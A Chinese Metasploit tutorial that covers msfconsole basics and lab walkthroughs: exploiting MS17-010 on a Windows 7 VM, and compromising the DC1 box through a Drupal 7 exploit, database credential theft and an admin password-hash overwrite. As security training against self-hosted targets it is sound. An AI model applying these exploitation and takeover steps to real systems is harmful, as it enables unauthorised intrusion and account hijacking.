MSF(etasploit Framework)工具使用与实战
MSF工具介绍工具简介全称Metasploit Framework是漏洞研究、渗透测试、漏洞验证的一体化平台主要有以下五大核心模块Auxiliary辅助模块漏洞扫描、信息收集、端口扫描、服务探测无攻击载荷Exploits漏洞利用模块针对已知漏洞的攻击代码核心Payloads攻击载荷漏洞利用成功后执行的代码如 MeterpreterEncoders编码器对载荷编码绕过杀软Post后渗透模块权限维持、信息窃取、内网渗透核心组件msfconsoleMSF 主命令行控制台最常用msfvenom生成各类木马 / Payloadexe、apk、php 等Meterpreter内存注入式高级 Shell功能极强、免杀性好msf基础命令1. 启动与全局命令msfconsole # 启动控制台 help / ? # 查看帮助 version # 查看版本 exit / quit # 退出2. 模块搜索与加载search 关键词 # 搜索模块漏洞名/平台/服务 例search ms17_010 例search type:auxiliary portscan use 模块名 # 加载模块 例use auxiliary/scanner/portscan/tcp 例use exploit/windows/smb/ms17_010_eternalblue back # 退出当前模块 info # 查看模块详情作者、漏洞、参数3. 模块配置show options # 查看必须配置的参数 set 选项名 值 # 设置参数 例set RHOSTS 192.168.1.100 # 目标IP 例set RHOSTS 192.168.1.0/24 # 网段扫描 例set THREADS 50 # 线程数 setg 选项名 值 # 全局设置所有模块生效 unset 选项名 # 取消设置 unsetg 选项名 # 取消全局设置4. 执行扫描 / 攻击run / exploit # 运行模块Aux用runExploit用exploit5. 数据库与扫描db_status # 查看数据库状态 db_nmap # 集成Nmap扫描结果入库 例db_nmap -sV 192.168.1.0/24 hosts # 查看扫描入库的主机 services # 查看开放端口/服务MSF靶场实战ms17-010漏洞扫描永恒之蓝在虚拟机中安装好kali和win7系统在kali系统终端中获取kali和win7的ip地址使用nmap扫描存活主机IP或者用ipconfig命令到本机终端执行查看都可以在kali输入msfconsole启动msf输入search ms17-010查看漏洞模块扫描过程使用use auxiliary/scanner/smb/smb_ms17_010或者use 3命令攻击过程使用use exploit/windows/smb/ms17_010_eternalblue或者use 0命令设计攻击载荷设置攻击机ip和被攻击机iprun运行成功运行显示远程主机系统信息sysinfoDC1靶场在vmware虚拟机中安装kali linux系统以及DC1靶场网络适配器选择桥接模式以保证二者在同一网络内DC1是我自己找的靶场部署到本地上的。在root根权限下使用arp-scan -l查看网段所有的主机。得到DC1的IP地址172.17.142.142使用nmap对DC1进行端口扫描发现DC1的22端口、80端口、111端口是打开的22端口可以使用爆破、ssh远程连接80端口可以登录web网页进入目标网址通过火狐浏览器插件wappalyzer发现该网站使用的是Drupal 7的CMS搭建的接下来启动Metasploit搜索漏洞使用msfconsole命令启动msf在msf中搜索drupal 7的漏洞search drupal 7.x发现有可以利用的攻击脚本0使用此脚本use 0再使用options查看此参数信息使用set rhosts 172.17.142.142DC1的ip再输入run即可进入DC1的shell环境。我们得到的是一个不完整的shell所以使用python中的pty模块来反弹一个完整的shell进入到该用户下后在目录中找到配置文件并查看查看settings.txt,发现了数据库的信息使用用户密码连接数据库mysql -udbuser -pR0ck3t;在数据库中查找到users表查找其中内容在users表中我们发现有admin用户但是密码是加盐过的。这里选择修改用户密码来解决。exit退出mysql回到/var/www下执行以下代码生成自己的加盐密码php scripts/password-hash.sh 123456再次连接数据库使用drupaldb数据库使用updata数据库执行语句将admin的密码设置为刚生成的加盐密码现在可以使用admin/123456在火狐浏览器登录成功进入网站
本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处:http://www.coloradmin.cn/o/2479203.html
如若内容造成侵权/违法违规/事实不符,请联系多彩编程网进行投诉反馈,一经查实,立即删除!